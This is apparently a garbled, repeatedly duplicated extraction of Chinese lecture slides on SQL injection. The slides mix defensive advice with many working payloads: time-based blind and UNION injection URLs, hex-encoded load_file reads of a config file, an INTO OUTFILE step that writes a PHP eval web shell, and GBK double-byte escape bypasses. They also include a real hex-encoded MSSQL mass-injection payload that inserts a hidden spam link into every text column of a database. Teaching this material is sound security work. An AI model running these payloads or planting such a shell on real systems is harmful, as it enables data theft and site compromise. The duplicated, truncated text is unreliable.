4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
